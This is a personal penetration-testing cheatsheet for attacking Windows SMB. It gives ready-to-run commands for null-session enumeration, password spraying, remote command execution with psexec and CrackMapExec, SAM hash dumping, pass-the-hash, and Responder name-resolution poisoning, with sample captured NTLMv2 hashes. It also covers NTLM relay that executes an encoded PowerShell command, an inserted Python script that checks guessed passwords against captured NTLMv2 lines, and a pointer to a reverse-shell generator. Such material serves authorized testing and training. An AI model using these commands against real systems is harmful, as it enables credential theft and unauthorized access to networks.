My Pentesting Cheatsheet

SMB

Server Message Block

SMB was originally designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138.

However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer.

Enumeration

sudo nmap 10.129.14.128 -sV -sC -p139,445

Misconfigurations

File Share

SMB can be configured not to require authentication, which is often called a null session. Instead, we can log in to a system with no username or password.

smbclient -N -L //<IP>

The -L option lists the server's shares, and -N suppresses the password prompt so the connection is attempted as a null session.

Smbmap is another tool that helps us enumerate network shares and access associated permissions. An advantage of smbmap is that it provides a list of permissions for each shared folder.

smbmap -H <IP>

Using smbmap with the -r or -R (recursive) option, one can browse the directories:

smbmap -H <IP> -r notes
smbmap -H <IP> --download "notes\note.txt"
smbmap -H <IP> --upload test.txt "notes\test.txt"

Remote Procedure Call (RPC)

We can use the rpcclient tool with a null session to enumerate a workstation or Domain Controller.

rpcclient -U'%' <IP>
> enumdomusers

Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:

  • Workgroup/Domain name

  • Users information

  • Operating system information

  • Groups information

  • Shares Folders

  • Password policy information

./enum4linux-ng.py <IP> -A -C

Protocol Specific Attacks

crackmapexec smb <IP> -u <user or userlist> -p <password or passwordlist> --local-auth

By default, CME exits after a successful login is found. The --continue-on-success flag keeps spraying even after a valid password is found, which is very useful when spraying a single password against a large user list. Additionally, if we are targeting a non-domain-joined computer, we need to use the option --local-auth. For a more detailed study of password spraying, see the Active Directory Enumeration & Attacks module.

SMB

When attacking a Windows SMB server, our actions are limited by the privileges of the user we manage to compromise. If this user is an Administrator or has specific privileges, we will be able to perform operations such as:

  • Remote Command Execution

  • Extract Hashes from SAM Database

  • Enumerating Logged-on Users

  • Pass-the-Hash (PtH)

impacket-psexec administrator:'Password123!'@<IP>
crackmapexec smb <IP> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

If --exec-method is not defined, CrackMapExec tries the atexec method first; if that fails, you can specify --exec-method smbexec explicitly.

Enumerating Logged-on Users

Imagine we are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use CrackMapExec to enumerate logged-on users on all machines within the same network 10.10.110.17/24, which speeds up our enumeration process.

crackmapexec smb <NetIP>/24 -u administrator -p 'Password123!' --loggedon-users

Extract Hashes from SAM Database

crackmapexec smb <IP> -u administrator -p 'Password123!' --sam

Pass-the-Hash (PtH)

We can use a PtH attack with any Impacket tool, SMBMap, CrackMapExec, among other tools. Here is an example of how this would work with CrackMapExec:

crackmapexec smb <IP> -u Administrator -H <HASH>

Forced Authentication Attacks

responder -I <interface name>

When a user or a system tries to perform Name Resolution (NR), a machine runs through a series of steps to retrieve a host's IP address from its hostname. On Windows machines, the procedure is roughly as follows:

  • The IP address of the file share's hostname is required.

  • The local hosts file (C:\Windows\System32\Drivers\etc\hosts) is checked for a suitable record.

  • If no record is found, the machine falls back to the local DNS cache, which keeps track of recently resolved names.

  • If there is no local DNS record, a query is sent to the configured DNS server.

  • If all else fails, the machine issues a multicast query (LLMNR, NBT-NS, or mDNS), requesting the IP address of the file share from other machines on the network.

Suppose a user mistyped a shared folder's name \\mysharefoder\ instead of \\mysharedfolder\. In that case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including us running our fake SMB server. This is a problem because no measures are taken to verify the integrity of the responses. Attackers can take advantage of this mechanism by listening in on such queries and spoofing responses, leading the victim to believe malicious servers are trustworthy. This trust is usually used to steal credentials.

Example output of responder:

[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:0101000000000000B09B51939BA6D40140C54ED46AD58E890000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000000000000003000004289286EDA193B087E214F3E16E2BE88FEC5D9FF73197456C9A6861FF5B5D3330000000000000000

All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

If you notice multiple hashes for one account, this is because NTLMv2 uses both a client-side and a server-side challenge that are randomized for each interaction. The resulting responses are therefore salted with random values, so the captured hashes differ even though they all derive from the same password.
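As an added example (not part of the original cheatsheet), the following Python recomputes a Responder-style NTLMv2-SSP line (the hashcat 5600 format shown above) from a password and shows why two captures of the same account differ yet verify against the same password. User, domain, challenges, blobs and password are constructed sample values, and MD4 is inlined because many hashlib builds no longer provide it.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often leave MD4 out of hashlib."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, shift table, message-word order)
        (F, 0, (3, 7, 11, 19), lambda i: i),
        (G, 0x5A827999, (3, 5, 9, 13), lambda i: (i % 4) * 4 + i // 4),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), lambda i: int(f"{i:04b}"[::-1], 2)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, K, shifts, order in rounds:
            for i in range(16):  # each step updates one word, then the four words rotate
                a, b, c, d = d, rol((a + fn(b, c, d) + X[order(i)] + K) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)), the per-user value a SAM dump contains."""
    return md4(password.encode("utf-16le"))

def ntlmv2_line(password: str, user: str, domain: str, server_chal: bytes, blob: bytes) -> str:
    """Compute the NTLMv2-SSP line Responder logs (hashcat -m 5600 format, MS-NLMP 3.3.2)."""
    # NTLMv2 hash = HMAC-MD5(NT hash, UPPER(user) + domain): depends only on the password and account
    v2_hash = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    # NTProofStr = HMAC-MD5(NTLMv2 hash, server challenge || client blob): both inputs change per logon
    proof = hmac.new(v2_hash, server_chal + blob, hashlib.md5).digest()
    return f"{user}::{domain}:{server_chal.hex()}:{proof.hex()}:{blob.hex()}"

def verify(line: str, candidate: str) -> bool:
    """Recompute the proof for one candidate password, as hashcat mode 5600 does per guess."""
    user, _, domain, chal, _proof, blob = line.split(":")
    return ntlmv2_line(candidate, user, domain, bytes.fromhex(chal), bytes.fromhex(blob)) == line

if __name__ == "__main__":  # constructed sample: same password, two logons with different challenges/blobs
    l1 = ntlmv2_line("Password123!", "demouser", "WIN7BOX", bytes.fromhex("997b18cc61099ba2"), bytes.fromhex("0101000000000000") + bytes(range(16)))
    l2 = ntlmv2_line("Password123!", "demouser", "WIN7BOX", bytes.fromhex("a1b2c3d4e5f60718"), bytes.fromhex("0101000000000000") + bytes(range(16, 32)))
    print(l1, l2, "lines differ:", l1 != l2, "both verify:", verify(l1, "Password123!") and verify(l2, "Password123!"), sep="\n")
```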

To relay captured hashes instead of only capturing them, we first need to set SMB to Off in the Responder configuration file (/etc/responder/Responder.conf), so that Responder does not answer SMB connections itself and ntlmrelayx can listen on that port:

cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off

Then we execute impacket-ntlmrelayx with the options --no-http-server and -smb2support, specifying the target machine with -t. By default, impacket-ntlmrelayx dumps the SAM database of the target, but we can execute commands instead by adding the option -c.

impacket-ntlmrelayx --no-http-server -smb2support -t <IP>
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c 'powershell -e [...]'

RPC

In the Footprinting page, we discuss how to enumerate a machine using RPC. Apart from enumeration, we can use RPC to make changes to the system, such as:

  • Change a user's password.

  • Create a new domain user.

  • Create a new shared folder.

Keep in mind that some specific configurations are required to allow these types of changes through RPC. We can use the rpcclient man page or the SMB Access from Linux Cheat Sheet from the SANS Institute to explore this further. We can also use this cheat sheet from the SANS Institute or review the complete list of all these functions on the man page of rpcclient.

The original enum4linux tool was written in Perl and rewritten by Mark Lowe in Python.

If a null session is not enabled, we will need credentials to interact with the SMB protocol. Two common ways to obtain credentials are brute forcing and password spraying.

Netexec is the fork and continuation of crackmapexec.

We can download PsExec from the Microsoft website, or we can use some Linux implementations:

- Impacket PsExec - Python PsExec-like functionality example using RemComSvc.

- Impacket SMBExec - A similar approach to PsExec without using RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.

- Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

- CrackMapExec - includes an implementation of smbexec and atexec.

- Metasploit PsExec - Ruby PsExec implementation.

We can also abuse the SMB protocol by creating a fake SMB server to capture users' NetNTLM v1/v2 hashes.

The most common tool to perform such operations is Responder, an LLMNR, NBT-NS, and MDNS poisoner with different capabilities; one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

These captured credentials can be cracked using hashcat or relayed to a remote host to complete the authentication and impersonate the user.

If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx or Responder's MultiRelay.py.

We can create a PowerShell reverse shell using https://www.revshells.com/, set our machine IP address, port, and the option Powershell #3 (Base64).

Last updated 6 months ago